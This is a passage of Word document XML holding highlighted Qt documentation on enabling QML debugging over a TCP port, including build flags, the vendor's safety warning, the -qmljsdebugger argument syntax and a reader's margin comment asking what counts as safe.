          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3016" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provides services for debugging, inspecting, and profiling applications via a </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP port</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2748" w:name="enabling-the-infrastructure"/>
      <w:bookmarkStart w:id="2749" w:name="_Toc483604467"/>
      <w:bookmarkStart w:id="2750" w:name="_Toc483605687"/>
      <w:bookmarkEnd w:id="2748"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enabling the Infrastructure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2749"/>
      <w:bookmarkEnd w:id="2750"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have to explicitly enable the debugging infrastructure when compiling your application</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you use </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmake</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add the configuration parameters to the project .pro file</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 1:</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONFIG+=declarative_debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 2:</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONFIG+=qml_debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you use some other build system, you can pass the following defines to the compiler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 1:</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT_DECLARATIVE_DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick 2:</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT_QML_DEBUG</w:t>
      </w:r>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b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enabling the debugging infrastructure might compromise the integrity of the application and system, and therefore, you should only enable it in a controlled environment. When the infrastructure is enabled, the application displays the following warning</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML debugging is enabled. Only use this in a safe environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu nuances. What is safe?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2751" w:name="starting-applications"/>
      <w:bookmarkStart w:id="2752" w:name="_Toc483604468"/>
      <w:bookmarkStart w:id="2753" w:name="_Toc483605688"/>
      <w:bookmarkEnd w:id="2751"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Starting Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2752"/>
      <w:bookmarkEnd w:id="2753"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start the application with the following arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-qmljsdebugger=port:&lt;port_from&gt;[,port_to][,host:&lt;ip address&gt;][,block]</w:t>
      </w:r>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color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port_from</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(mandatory) specifies either the debugging port or the start port of a range of ports when</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>port_to</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is specified,</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip address</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(optional) specifies the IP address of the host where the application is running, and</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
